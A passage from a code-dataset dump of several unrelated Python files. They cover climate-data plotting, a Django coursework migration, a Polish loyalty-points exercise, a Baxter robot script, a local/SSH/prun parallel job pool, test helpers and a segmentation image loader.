avg_axis = 0\n avg_arr = np.sum(arr_avg * area_arr, axis=avg_axis) / np.sum(area_arr, axis=avg_axis)\n return avg_arr\n\n\ndef makeSubplot(col_list, ax, row, filetype, avg_coord, num_files=10, unit_conv=1, depth=None):\n if avg_coord == 'lat':\n x = row['lat']\n x_label = 'Latitude'\n elif avg_coord == 'lon':\n x = row['lon']\n x_label = 'Longitude'\n var = row['var']\n title = row['title']\n units = row['units']\n for col in col_list:\n filedir = col['filedir']\n val_arr = avgDataFilesLatLon(filedir, var, num_files, filetype, unit_conv, depth, avg_coord)\n SA = str(col['SA']) + '%'\n if SA == '0%':\n SA = 'Aqua'\n ax.plot(x, val_arr, label=SA)\n if var == 'tsurf':\n ax.axhline(linestyle='--', color='k')\n ax.set_title('Average ' + title)\n ax.set_xlabel(x_label)\n ax.set_ylabel(units)\n\ndef latLonAvgPlot():\n col_list = [col_0, col_11, col_39]\n row = row_tsurf\n fig, ax = plt.subplots()\n\n makeSubplot(col_list, ax, row, filetype='aijpc', avg_coord='lon')\n ax.legend()\n fig.tight_layout(w_pad = 2.25)\n file_name = 'plots/lon_tsurf'\n # plt.savefig(file_name+'.svg')\n plt.savefig(file_name+'.pdf')\n plt.show()\n","sub_path":"plot_scripts/latLonAvgPlot.py","file_name":"latLonAvgPlot.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"180075252","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('network', '0007_auto_20150505_0129'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='CourseWork',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('creation_date', models.DateTimeField(auto_now=True, null=True)),\n ('coursework_id', models.CharField(max_length=10, unique=True, null=True)),\n ('title', models.CharField(max_length=30)),\n ('description', models.CharField(max_length=75)),\n ('submission_type', models.CharField(default=b'Online', max_length=30, choices=[(b'In class', b'In class'), (b'Online', b'Online')])),\n ('deadline', models.DateTimeField()),\n ('attachment', models.FileField(default=None, null=True, upload_to=b'', blank=True)),\n ('section', models.ForeignKey(to='network.Section')),\n ],\n ),\n migrations.CreateModel(\n name='Submission',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('submission_date', models.DateTimeField(auto_now=True, null=True)),\n ('notes', models.CharField(max_length=150, null=True)),\n ('attachment', models.FileField(null=True, upload_to=b'', blank=True)),\n ('grade', models.IntegerField(validators=[django.core.validators.MaxValueValidator(100), django.core.validators.MinValueValidator(0)])),\n ('course_work', models.ForeignKey(to='network.CourseWork')),\n ('submitted_by', models.ForeignKey(to='network.Student')),\n ],\n ),\n migrations.AlterField(\n model_name='lecturer',\n name='academic_rank',\n field=models.CharField(max_length=50),\n ),\n migrations.AlterField(\n model_name='lecturer',\n name='admin_rank',\n field=models.CharField(max_length=50, null=True, blank=True),\n ),\n ]\n","sub_path":"network/migrations/0008_auto_20150506_0336.py","file_name":"0008_auto_20150506_0336.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"624566906","text":"# 11. Program lojalnościow\n\n# Księgarnia Serendipity Booksellers prowadzi program lojalnościowy, który\n# w zależności od liczby książek zakupionych przez klienta w danym miesiącu\n# nagradza go odpowiednią liczbą punktów. Punkty przyznawane są w następujący sposób:\n\n# jeżeli klient kupil 0 ksiązek, otrzymuje 0 punktów\n# jeżeli klient kupil 2 książki, otrzymuje 5 punktów\n# jeżeli klient kupil 4 książki, otrzymuje 15 punktów\n# jeżeli klient kupil 6 książek, otrzymuje 30 punktów\n# jeżeli klient kupil 8 lub więcej książek, otrzymuje 60 punktów\n\n# Opracuj program, który będzie prosił użytkownika o podanie liczby książek \n# zakupionych przez niego w danym miesiącu, a następnie wyświetli liczbę\n# przyznanych punktów.\n\nimport os\nos.system('cls') #Wyczyszczenie okna terminala\n\n\nzakupioneKsiazki = int(input(\"Podaj liczbę zakupionych książek w tym miesiącu: \"))\nif zakupioneKsiazki > 0:\n if zakupioneKsiazki < 2 and zakupioneKsiazki > 0:\n print(\"\\nMasz 0 punktów\")\n elif zakupioneKsiazki >= 2 and zakupioneKsiazki < 4:\n print(\"\\nMasz 5 punkty\")\n elif zakupioneKsiazki >= 4 and zakupioneKsiazki < 6:\n print(\"\\nMasz 15 punkty\")\n elif zakupioneKsiazki >= 6 and zakupioneKsiazki <8:\n print(\"\\nMasz 30 punkty\")\n elif zakupioneKsiazki >= 8:\n print(\"\\nMasz 60 punkty\")\nelse:\n print(\"\\nWprowadz liczbę dodatnią\")\n","sub_path":"Rozdzial3/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"448725022","text":"#!/usr/bin/env python\n\nimport rospy\nimport baxter_interface\nimport argparse\nimport time\n\nfrom motion_consts import NEUTRAL_R, POINT\nfrom .log import log\n\nrospy.init_node('node')\n\nl_limb = baxter_interface.Limb('right')\n\ndef point(i_s):\n\tfor i in i_s:\n\t\tl_limb.move_to_joint_positions(POINT[i])\n\t\ttime.sleep(2)\n\tl_limb.move_to_joint_positions(NEUTRAL_R)\n\nparser = argparse.ArgumentParser(description=\"point at card parser\")\nparser.add_argument('--nargs-int-type', nargs='+', type=int)\n\t\n\nfor _, values in parser.parse_args()._get_kwargs():\n\tfor v in values:\n\t\tif v not in range(0,5):\n\t\t\tlog('all arguments must be integers from 0-4 inclusive')\n\tpoint(values)\n","sub_path":"baxter/point.py","file_name":"point.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"21475183","text":"import fcntl\nimport io\nimport logging\nimport os\nimport random\nimport re\nimport select\nimport shlex\nimport sys\nimport threading\nimport time\nfrom abc import ABCMeta, abstractmethod\nfrom dataclasses import dataclass, field\nfrom subprocess import STDOUT\nfrom typing import (\n IO,\n Any,\n Callable,\n Dict,\n Iterable,\n Iterator,\n List,\n Optional,\n Sequence,\n Tuple,\n Union,\n)\n\nfrom .context import Context\nfrom .util import FatalError, Process, require_program, run\n\n# TODO: rewrite this to use\n# https://docs.python.org/3/library/concurrent.futures.html?\n\n\n@dataclass\nclass Job:\n proc: Process\n jobid: str\n outfiles: List[str]\n\n nnodes: int = field(default=1, init=False)\n start_time: float = field(default_factory=time.time, init=False)\n onsuccess: Optional[Callable[[\"Job\"], None]] = field(default=None, init=False)\n onerror: Optional[Callable[[\"Job\"], None]] = field(default=None, init=False)\n output: str = field(default=\"\", init=False)\n\n @property\n def stdout(self) -> IO:\n return self.proc.stdout_io\n\n\n@dataclass\nclass ProcessJob(Job):\n outfile_handle: IO\n\n\n@dataclass\nclass SSHJob(Job):\n outfile_handle: IO\n node: str\n\n tunnel_src: Optional[int] = None\n tunnel_dest: Optional[int] = None\n\n\n@dataclass\nclass PrunJob(Job):\n nnodes: int\n\n logged: bool = False\n\n\nclass Pool(metaclass=ABCMeta):\n \"\"\"\n A pool is used to run processes in parallel as jobs when ``--parallel`` is\n specified on the command line. The pool is created automatically by\n :class:`Setup` and passed to :func:`Target.build` and :func:`Target.run`.\n However, the pool is only passed if the method implementation defines a\n parameter for the pool, i.e.::\n\n class MyTarget(Target):\n def build(self, ctx, instance, pool): # receives Pool instance\n ...\n def run(self, ctx, instance): # does not receive it\n ...\n\n The maximum number of parallel jobs is controlled by ``--parallelmax``. For\n ``--parallel=proc`` this is simply the number of parallel processes on the\n current machine. For ``--parallel=prun`` it is the maximum number of\n simultaneous jobs in the job queue (pending or running).\n \"\"\"\n\n poll_interval: float = 0.050 # seconds to wait for blocking actions\n\n jobs: Dict[int, Job]\n pollthread: Optional[threading.Thread]\n\n @abstractmethod\n def make_jobs(\n self,\n ctx: Context,\n cmd: Union[str, Iterable[str]],\n jobid_base: str,\n outfile_base: str,\n nnodes: int,\n **kwargs: Any,\n ) -> Iterator[Job]:\n pass\n\n @abstractmethod\n def process_job_output(self, job: Job) -> None:\n pass\n\n def __init__(self, logger: logging.Logger, parallelmax: int):\n \"\"\"\n :param logger: logging object for status updates (set to ``ctx.log``)\n :param parallelmax: value of ``--parallelmax``\n \"\"\"\n self.log = logger\n self.parallelmax = parallelmax\n self.jobs = {}\n self.pollthread = None\n\n def __del__(self) -> None:\n if self.pollthread is not None:\n self.done = True\n self.pollthread.join(self.poll_interval)\n\n def _start_poller(self) -> None:\n if self.pollthread is None:\n self.poller = select.epoll()\n self.pollthread = threading.Thread(\n target=self._poller_thread, name=\"pool-poller\"\n )\n self.pollthread.daemon = True\n self.done = False\n self.pollthread.start()\n\n def _poller_thread(self) -> None:\n # monitor the job queue for finished jobs, remove them from the queue\n # and call success/error callbacks\n while not self.done:\n for fd, flags in self.poller.poll(timeout=self.poll_interval):\n if flags & (select.EPOLLIN | select.EPOLLPRI):\n self.process_job_output(self.jobs[fd])\n\n if flags & select.EPOLLERR:\n self.poller.unregister(fd)\n job = self.jobs.pop(fd)\n self.onerror(job)\n\n if flags & select.EPOLLHUP:\n job = self.jobs[fd]\n if job.proc.poll() is None:\n self.log.debug(\n f\"job {job.jobid} hung up but does not yet have a \"\n \"return code, check later\"\n )\n continue\n\n self.poller.unregister(fd)\n del self.jobs[fd]\n\n if job.proc.poll() == 0:\n self.onsuccess(job)\n else:\n self.onerror(job)\n\n def _wait_for_queue_space(self, nodes_needed: int) -> None:\n if self.parallelmax is not None:\n\n def nodes_in_use() -> int:\n return sum(job.nnodes for job in self.jobs.values())\n\n while nodes_in_use() + nodes_needed > self.parallelmax:\n time.sleep(self.poll_interval)\n\n def wait_all(self) -> None:\n \"\"\"\n Block (busy-wait) until all jobs in the queue have been completed.\n Called automatically by :class:`Setup` after the ``build`` and ``run``\n commands.\n \"\"\"\n while len(self.jobs):\n time.sleep(self.poll_interval)\n\n def run(\n self,\n ctx: Context,\n cmd: Union[str, Iterable[str]],\n jobid: str,\n outfile: str,\n nnodes: int,\n onsuccess: Optional[Callable[[Job], None]] = None,\n onerror: Optional[Callable[[Job], None]] = None,\n **kwargs: Any,\n ) -> Iterable[Job]:\n \"\"\"\n A non-blocking wrapper for :func:`util.run`, to be used when\n ``--parallel`` is specified.\n\n :param ctx: the configuration context\n :param cmd: the command to run\n :param jobid: a human-readable ID for status reporting\n :param outfile: full path to target file for command output\n :param nnodes: number of cores or machines to run the command on\n :param onsuccess: callback when the job finishes successfully\n :param onerror: callback when the job exits with (typically I/O) error\n :param kwargs: passed directly to :func:`util.run`\n :returns: handles to created job processes\n \"\"\"\n # TODO: generate outfile from jobid\n self._start_poller()\n\n if isinstance(cmd, str):\n cmd = shlex.split(cmd)\n\n jobs = []\n\n for job in self.make_jobs(ctx, cmd, jobid, outfile, nnodes, **kwargs):\n job.onsuccess = onsuccess\n job.onerror = onerror\n job.output = \"\"\n self.jobs[job.proc.stdout_io.fileno()] = job\n self.poller.register(\n job.proc.stdout_io,\n select.EPOLLIN | select.EPOLLPRI | select.EPOLLERR | select.EPOLLHUP,\n )\n jobs.append(job)\n\n return jobs\n\n def onsuccess(self, job: Job) -> None:\n # don't log if onsuccess() returns False\n if not job.onsuccess or job.onsuccess(job) is not False:\n self.log.info(f\"job {job.jobid} finished {self._get_elapsed(job)}\")\n self.log.debug(f\"command: {job.proc.cmd_str}\")\n\n def onerror(self, job: Job) -> None:\n # don't log if onerror() returns False\n if not job.onerror or job.onerror(job) is not False:\n self.log.error(\n f\"job {job.jobid} returned status {job.proc.returncode} \"\n f\"{self._get_elapsed(job)}\"\n )\n self.log.error(f\"command: {job.proc.cmd_str}\")\n sys.stdout.write(job.output)\n\n def _get_elapsed(self, job: Job) -> str:\n elapsed = round(time.time() - job.start_time)\n return f\"after {elapsed} seconds\"\n\n\nclass ProcessPool(Pool):\n def make_jobs(\n self,\n ctx: Context,\n cmd: Union[str, Iterable[str]],\n jobid_base: str,\n outfile_base: str,\n nnodes: int,\n **kwargs: Any,\n ) -> Iterator[Job]:\n for i in range(nnodes):\n jobid = jobid_base\n outfile = outfile_base\n if nnodes > 1:\n jobid += f\"-{i}\"\n outfile += f\"-{i}\"\n\n self._wait_for_queue_space(1)\n ctx.log.info(\"running \" + jobid)\n\n proc = run(\n ctx,\n cmd,\n defer=True,\n stderr=STDOUT,\n bufsize=io.DEFAULT_BUFFER_SIZE,\n universal_newlines=False,\n **kwargs,\n )\n _set_non_blocking(proc.stdout_io)\n os.makedirs(os.path.dirname(outfile), exist_ok=True)\n job = ProcessJob(proc, jobid, [outfile], open(outfile, \"wb\"))\n\n yield job\n\n def process_job_output(self, job: Job) -> None:\n assert isinstance(job, ProcessJob)\n buf = job.stdout.read(io.DEFAULT_BUFFER_SIZE)\n if buf is not None:\n job.output += buf.decode(\"ascii\", errors=\"replace\")\n job.outfile_handle.write(buf)\n\n def onsuccess(self, job: Job) -> None:\n assert isinstance(job, ProcessJob)\n job.outfile_handle.close()\n super().onsuccess(job)\n\n def onerror(self, job: Job) -> None:\n assert isinstance(job, ProcessJob)\n job.outfile_handle.close()\n super().onerror(job)\n\n\nclass SSHPool(Pool):\n \"\"\"\n An SSHPool runs jobs on remote nodes via ssh.\n\n The --ssh-nodes argument specified a list of ssh hosts to distribute the\n work over. These hosts are passed as-is to the ssh command; the best way for\n specifying alternative ssh ports, user, and other options is to add your\n hosts to the ~/.ssh/config file. Additionally, make sure the hosts can be\n reached without password prompts (e.g., by using passphrase-less keys or\n using an ssh agent).\n\n For targets that are being run via an SSHPool additional functionality is\n available, such as distributing files to/from nodes.\n \"\"\"\n\n ssh_opts = [\n # Block stdin and background ssh before executing command.\n \"-f\",\n # Eliminate some of the yes/no questions ssh may ask.\n \"-oStrictHostKeyChecking=accept-new\",\n ]\n scp_opts = [\n # Quiet mode to disable progress meter\n \"-q\",\n # Batch mode to prevent asking for password\n \"-B\",\n # Copy directories\n \"-r\",\n ]\n\n _tempdir: Optional[str]\n\n def __init__(\n self, ctx: Context, logger: logging.Logger, parallelmax: int, nodes: List[str]\n ):\n if parallelmax > len(nodes):\n raise FatalError(\n \"parallelmax cannot be greater than number of available nodes\"\n )\n super().__init__(logger, parallelmax)\n self._ctx = ctx\n self.nodes = nodes[:]\n self.available_nodes = nodes[:]\n self.has_tested_nodes = False\n self.has_created_tempdirs = False\n\n @property\n def tempdir(self) -> str:\n if not self.has_created_tempdirs:\n self.create_tempdirs()\n assert self._tempdir is not None\n return self._tempdir\n\n def _ssh_cmd(\n self,\n node: str,\n cmd: Union[str, Iterable[str]],\n extra_opts: Optional[Sequence[Any]] = None,\n ) -> List[str]:\n if not isinstance(cmd, str):\n cmd = \" \".join(shlex.quote(str(c)) for c in cmd)\n extra_opts = extra_opts or []\n return [\"ssh\", *self.ssh_opts, *extra_opts, node, cmd]\n\n def test_nodes(self) -> None:\n if self.has_tested_nodes:\n return\n for node in self.nodes:\n cmd = [\"ssh\", *self.ssh_opts, node, \"echo -n hi\"]\n p = run(self._ctx, cmd, stderr=STDOUT, silent=True)\n if p.returncode or not str(p.stdout).endswith(\"hi\"):\n self._ctx.log.error(\n \"Testing SSH node \" + node + \" failed:\\n\" + p.stdout\n )\n sys.exit(-1)\n self.has_tested_nodes = True\n\n def create_tempdirs(self) -> None:\n if self.has_created_tempdirs:\n return\n\n self.test_nodes()\n\n starttime = self._ctx.starttime.strftime(\"%Y-%m-%d.%H-%M-%S\")\n self._tempdir = os.path.join(\"/tmp\", \"infra-\" + starttime)\n\n self._ctx.log.debug(\n f\"creating SSHPool temp dir {self._tempdir} on nodes {self.nodes}\"\n )\n\n for node in self.nodes:\n run(self._ctx, self._ssh_cmd(node, [\"mkdir\", \"-p\", self._tempdir]))\n\n self.has_created_tempdirs = True\n\n def cleanup_tempdirs(self) -> None:\n if not self.has_created_tempdirs:\n return\n assert self._tempdir is not None\n self._ctx.log.debug(\n f\"cleaning up SSHPool temp directory {self._tempdir} on nodes {self.nodes}\"\n )\n for node in self.nodes:\n run(self._ctx, self._ssh_cmd(node, [\"rm\", \"-rf\", self._tempdir]))\n self.has_created_tempdirs = False\n self._tempdir = None\n\n def sync_to_nodes(\n self,\n sources: Union[str, Iterable[str]],\n destination: str = \"\",\n target_nodes: Optional[Union[str, Iterable[str]]] = None,\n ) -> None:\n if isinstance(sources, str):\n sources = [sources]\n if isinstance(target_nodes, str):\n target_nodes = [target_nodes]\n nodes = target_nodes or self.nodes\n self._ctx.log.debug(\n f\"syncing file to SSHPool nodes, sources={sources},\"\n f\"destination={destination}, nodes={nodes}\"\n )\n for node in nodes:\n dest = f\"{node}:{os.path.join(self.tempdir, destination)}\"\n cmd = [\"scp\", *self.scp_opts, *sources, dest]\n run(self._ctx, cmd)\n\n def sync_from_nodes(\n self,\n source: str,\n destination: str = \"\",\n source_nodes: Optional[Sequence[str]] = None,\n ) -> None:\n if isinstance(source_nodes, str):\n source_nodes = [source_nodes]\n nodes = source_nodes or self.nodes\n\n self._ctx.log.debug(\n f\"syncing file from SSHPool nodes, source={source},\"\n f\"destination={destination}, nodes={nodes}\"\n )\n\n for i, node in enumerate(nodes):\n dest = destination or os.path.basename(source)\n if len(nodes) > 1:\n dest += \".\" + node\n if len(nodes) != len(set(nodes)):\n dest = f\"{dest}{i}\"\n src = f\"{node}:{os.path.join(self.tempdir, source)}\"\n cmd = [\"scp\", *self.scp_opts, src, dest]\n run(self._ctx, cmd)\n\n def get_free_node(self, override_node: Optional[str] = None) -> str:\n if override_node:\n assert override_node in self.nodes\n assert override_node in self.available_nodes\n self.available_nodes.remove(override_node)\n return override_node\n else:\n return self.available_nodes.pop()\n\n def make_jobs(\n self,\n ctx: Context,\n cmd: Union[str, Iterable[str]],\n jobid_base: str,\n outfile_base: str,\n nnodes: int,\n nodes: Optional[Union[str, List[str]]] = None,\n tunnel_to_nodes_dest: Optional[int] = None,\n **kwargs: Any,\n ) -> Iterator[Job]:\n if isinstance(nodes, str):\n nodes = [nodes]\n\n self.test_nodes()\n\n for i in range(nnodes):\n jobid = jobid_base\n outfile = outfile_base\n if nnodes > 1:\n jobid += f\"-{i}\"\n outfile += f\"-{i}\"\n\n self._wait_for_queue_space(1)\n override_node = nodes[i] if nodes else None\n node = self.get_free_node(override_node)\n ctx.log.info(\"running \" + jobid + \" on \" + node)\n\n ssh_node_opts = []\n tunnel_src = None\n if tunnel_to_nodes_dest:\n tunnel_src = random.randint(10000, 30000)\n ssh_node_opts += [\n f\"-Llocalhost:{tunnel_src}:0.0.0.0:{tunnel_to_nodes_dest}\"\n ]\n\n ssh_cmd = self._ssh_cmd(node, cmd, ssh_node_opts)\n proc = run(\n ctx,\n ssh_cmd,\n defer=True,\n stderr=STDOUT,\n bufsize=io.DEFAULT_BUFFER_SIZE,\n universal_newlines=False,\n **kwargs,\n )\n _set_non_blocking(proc.stdout_io)\n\n os.makedirs(os.path.dirname(outfile), exist_ok=True)\n job = SSHJob(proc, jobid, [outfile], open(outfile, \"wb\"), node)\n\n if tunnel_to_nodes_dest:\n job.tunnel_src = tunnel_src\n job.tunnel_dest = tunnel_to_nodes_dest\n\n yield job\n\n def process_job_output(self, job: Job) -> None:\n assert isinstance(job, SSHJob)\n buf = job.stdout.read(io.DEFAULT_BUFFER_SIZE)\n if buf is not None:\n job.output += buf.decode(\"ascii\", errors=\"replace\")\n job.outfile_handle.write(buf)\n\n def onsuccess(self, job: Job) -> None:\n assert isinstance(job, SSHJob)\n job.outfile_handle.close()\n self.available_nodes.append(job.node)\n super().onsuccess(job)\n\n def onerror(self, job: Job) -> None:\n assert isinstance(job, SSHJob)\n self.available_nodes.append(job.node)\n job.outfile_handle.close()\n super().onerror(job)\n\n\nclass PrunPool(Pool):\n default_job_time = 900 # if prun reserves this amount, it is not logged\n\n def __init__(\n self, logger: logging.Logger, parallelmax: int, prun_opts: Iterable[str]\n ):\n super().__init__(logger, parallelmax)\n self.prun_opts = prun_opts\n\n def make_jobs(\n self,\n ctx: Context,\n cmd: Union[str, Iterable[str]],\n jobid_base: str,\n outfile_base: str,\n nnodes: int,\n **kwargs: Any,\n ) -> Iterator[Job]:\n require_program(ctx, \"prun\")\n self._wait_for_queue_space(nnodes)\n ctx.log.info(\"scheduling \" + jobid_base)\n cmd = [\n \"prun\",\n \"-v\",\n \"-np\",\n str(nnodes),\n \"-1\",\n \"-o\",\n outfile_base,\n *self.prun_opts,\n *cmd,\n ]\n proc = run(\n ctx,\n cmd,\n defer=True,\n stderr=STDOUT,\n bufsize=0,\n universal_newlines=False,\n **kwargs,\n )\n _set_non_blocking(proc.stdout_io)\n outfiles = [f\"{outfile_base}.{i}\" for i in range(nnodes)]\n job = PrunJob(proc, jobid_base, outfiles, nnodes)\n yield job\n\n def process_job_output(self, job: Job) -> None:\n assert isinstance(job, PrunJob)\n\n def group_nodes(\n nodes: Sequence[Tuple[int, int]]\n ) -> List[Tuple[List[int], List[int]]]:\n groups = [([m], [c]) for m, c in sorted(nodes)]\n for i in range(len(groups) - 1, 0, -1):\n lmachines, lcores = groups[i - 1]\n rmachines, rcores = groups[i]\n if lmachines == rmachines and lcores[-1] + 1 == rcores[0]:\n groups[i - 1] = lmachines, lcores + rcores\n del groups[i]\n elif (\n len(lcores) == 1\n and lmachines[-1] + 1 == rmachines[0]\n and lcores == rcores\n ):\n groups[i - 1] = lmachines + rmachines, lcores\n del groups[i]\n return groups\n\n def stringify_groups(groups: List[Tuple[List[int], List[int]]]) -> str:\n samecore = set(c for m, cores in groups for c in cores) == set([0])\n\n def join(n: Sequence[Any], fmt: str) -> str:\n if len(n) == 1:\n return fmt % n[0]\n else:\n return fmt % n[0] + \"-\" + fmt % n[-1]\n\n if samecore:\n # all on core 0, omit it\n groupstrings = (join(m, \"%03d\") for m, c in groups)\n else:\n # different cores, add /N suffix\n groupstrings = (f\"{join(m, '%03d')}/{join(c, '%d')}\" for m, c in groups)\n\n if len(groups) == 1:\n m, c = groups[0]\n if len(m) == 1 and len(c) == 1:\n return \"node\" + next(groupstrings)\n\n return f\"node[{','.join(groupstrings)}]\"\n\n buf = job.stdout.read(1024)\n if buf is None:\n return\n\n job.output += buf.decode(\"ascii\")\n\n if job.logged:\n return\n\n numseconds = None\n nodes: List[Tuple[int, int]] = []\n\n for line in job.output.splitlines():\n if line.startswith(\":\"):\n for m in re.finditer(r\"node(\\d+)/(\\d+)\", line):\n nodes.append((int(m.group(1)), int(m.group(2))))\n elif numseconds is None:\n match = re.search(r\"for (\\d+) seconds\", line)\n if match:\n numseconds = int(match.group(1))\n\n if len(nodes) == job.nnodes:\n assert numseconds is not None\n nodestr = stringify_groups(group_nodes(nodes))\n self.log.info(f\"running {job.jobid} on {nodestr}\")\n job.start_time = time.time()\n job.logged = True\n\n\ndef _set_non_blocking(f: IO) -> None:\n flags = fcntl.fcntl(f, fcntl.F_GETFL)\n fcntl.fcntl(f, fcntl.F_SETFL, flags | os.O_NONBLOCK)\n","sub_path":"infra/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":21471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"289746343","text":"\"\"\"\nTest cases for frontend.\n\"\"\"\nimport unittest\n\nfrom django.test import TestCase\nfrom server.errors import FsimError\n\nfrom utils import Status\nfrom utils.typecheck import ensure_type\n\n\ndef assertStatusRegex(self, regex_status, status_object):\n \"\"\"\n Asserts that status_object.payload matches the regex_status.payload and that both\n have the same status type.\n\n regex_status.payload can be either an FsimError or an regex expression (as a\n string).\n\n Exceptions\n ----------\n TypeException: if regex_status or status_object are not Status objects or if the payload is not a string.\n \"\"\"\n ensure_type(\"regex_status\", regex_status, Status)\n ensure_type(\"status_object\", status_object, Status)\n\n ensure_type(\"status_object.payload\", status_object.payload, str)\n ensure_type(\n \"regex_status.payload\",\n status_object.payload,\n str,\n FsimError,\n FsimError.__class__,\n )\n\n if isinstance(regex_status.payload, FsimError) or isinstance(\n regex_status.payload, FsimError.__class__):\n regex_string = regex_status.payload.regex_string()\n elif isinstance(regex_status.payload, str):\n regex_string = regex_status.payload\n\n self.assertEqual(regex_status.status, status_object.status)\n self.assertRegex(status_object.payload, regex_string)\n\n\nclass StatusTestCase(TestCase):\n \"\"\"\n Provides functions to compare status objects.\n \"\"\"\n\n assertStatusRegex = assertStatusRegex\n\n\nclass SchedulerTestCase(unittest.TestCase):\n \"\"\"\n Testcase for the `Scheudler` which provides an addiational comparison.\n \"\"\"\n\n assertStatusRegex = assertStatusRegex\n\n def assertStatusSet(self, first, second):\n \"\"\"\n Asserts that two arrays of `Status` are equal by the defintion of a\n set.\n\n Arguments\n ---------\n first: list of Status\n First operand\n second: list of Status\n Second operand\n\n Raises\n ------\n AssertionError:\n If an element is found which does not belong the the list.\n \"\"\"\n\n self.assertTrue(len(first), len(second))\n\n no_fit = []\n\n for x in first:\n if x in second:\n second.remove(x)\n else:\n no_fit.append(x)\n\n if len(second) > 0:\n raise AssertionError((\"The elements {} does not have an\"\n \"counterpart. Leftovers: {}\").format(\n no_fit, second))\n","sub_path":"frontend/tests/testcases.py","file_name":"testcases.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"523505178","text":"import cv2\nfrom glob import glob\nimport os\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nfrom keras.utils import to_categorical\n\n# Color (BGR) to class\nINV_LABELMAP_DEER = {\n\t(0, 0, 128) : 0,\n\t(0, 0, 0) : 1,\n\t(0, 128, 0) : 2,\n\t(0, 128, 128) : 3,\n}\n\nCOLORS = [k for k, v in INV_LABELMAP_DEER.items()]\n\nclass DataLoader():\n\tdef __init__(self, dataset_name, img_res=(128, 128)):\n\t\tself.dataset_name = dataset_name\n\t\tself.img_res = img_res\n\n\tdef load_data(self, batch_size=1, is_testing=False):\n\t\tdata_type = \"train\" if not is_testing else \"test\"\n\t\tif is_testing:\n\t\t\tpath = glob('./datasets/%s/%s/*' % (self.dataset_name, data_type))\n\t\telse:\n\t\t\tpath = glob('./datasets/%s/%s/images/*' % (self.dataset_name, data_type))\n\n\t\tbatch_images = np.random.choice(path, size=batch_size)\n\n\t\timgs_A = []\n\t\timgs_B = []\n\t\timgs = []\n\t\tfor img_path in batch_images:\n\t\t\timg = self.imread(img_path)\n\n\t\t\th, w, _ = img.shape\n\t\t\t_w = int(w/2)\n\t\t\timg_B, img_A = img[:, :_w, :], img[:, _w:, :]\n\t\t\t# img = self.imread(os.path.join(img_path))\n\n\t\t\timgs_A.append(img_A)\n\t\t\timgs_B.append(img_B)\n\t\t\timgs.append(img_A)\n\n\t\t# imgs_A = np.array(imgs_A)/127.5 - 1.\n\t\timgs_B = np.array(imgs_B)/127.5 - 1.\n\n\t\treturn imgs_A, imgs_B, imgs\n\n\tdef load_batch(self, batch_size=1, is_testing=False):\n\t\tdata_type = \"train\" if not is_testing else \"val\"\n\t\tpath = glob('./datasets/%s/%s/images/*' % (self.dataset_name, data_type))\n\n\t\tself.n_batches = int(len(path) / batch_size)\n\n\t\tfor i in range(self.n_batches-1):\n\t\t\tbatch = path[i*batch_size:(i+1)*batch_size]\n\t\t\timgs_A, imgs_B, imgs = [], [], []\n\t\t\tfor img in batch:\n\t\t\t\t# img = self.imread(img)\n\t\t\t\t# h, w, _ = img.shape\n\t\t\t\t# half_w = int(w/2)\n\t\t\t\timg_B = self.imread(img)\n\t\t\t\timg_B = cv2.resize(img_B, self.img_res)\n\t\t\t\tfilename = img.split('/')\n\t\t\t\tlabel_filename = filename[len(filename) - 1]\n\t\t\t\tlabel_filename = 'extra-'.join(label_filename.split('extra'))\n\t\t\t\tlabel_path = os.path.join(\"datasets\", self.dataset_name, data_type, \"labels\", label_filename)\n\t\t\t\tif os.path.exists(label_path):\n\t\t\t\t\timg_input = self.imread(label_path)\n\t\t\t\t\timg_input = np.array(cv2.resize(img_input, self.img_res))\n\t\t\t\t\timg_A = np.zeros((img_input.shape[0], img_input.shape[1], 4))\n\t\t\t\t\tfor i in range(0, img_input.shape[0]):\n\t\t\t\t\t\tfor j in range(0, img_input.shape[1]):\n\t\t\t\t\t\t\ta = np.zeros((1, 4))\n\t\t\t\t\t\t\tarr = np.array(COLORS) - tuple(img_input[i,j,:])\n\t\t\t\t\t\t\tindex = np.argmin(np.sum(np.abs(arr), axis=1))\n\t\t\t\t\t\t\ta[0][index] = 1 \n\t\t\t\t\t\t\timg_A[i, j, :] = a.astype(np.uint8)\n\t\t\t\t\timgs.append(self.imread(label_path))\n\t\t\t\telse:\n\t\t\t\t\timg_A = np.zeros((img_B.shape[0], img_B.shape[1], 4)) * (-1)\n\t\t\t\t\timgs.append('')\n\t\t\t\t# img_A = to_categorical(img_input[:, :, 0], 4)\n\n\t\t\t\tif not is_testing and np.random.random() > 0.5:\n\t\t\t\t\t\timg_A = np.fliplr(img_A)\n\t\t\t\t\t\timg_B = np.fliplr(img_B)\n\n\t\t\t\timgs_A.append(img_A)\n\t\t\t\timgs_B.append(img_B)\n\n\t\t\t# imgs_A = np.array(imgs_A)/127.5 - 1.\n\t\t\timgs_B = np.array(imgs_B)/127.5 - 1.\n\n\t\t\tyield imgs_A, imgs_B, imgs\n\n\n\tdef imread(self, path):\n\t\treturn cv2.imread(path).astype(np.float)\n","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} 